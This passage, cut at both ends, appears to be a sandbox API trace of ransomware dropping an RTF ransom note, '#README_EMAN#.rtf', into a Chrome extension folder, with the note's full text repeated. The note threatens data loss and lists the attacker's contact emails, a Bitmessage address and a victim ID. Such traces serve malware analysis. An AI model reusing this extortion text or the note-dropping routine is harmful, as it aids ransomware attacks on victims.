t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\np¬WøÖ37\x1c\rx\x0b\x80¯5\x8c\x9cû)'\x9cý\x0e\x0f3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0286.499] WriteFile (in: hFile=0x2f0, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.499] CloseHandle (hObject=0x2f0) returned 1 [0286.499] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0286.500] GetLastError () returned 0x2 [0286.500] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 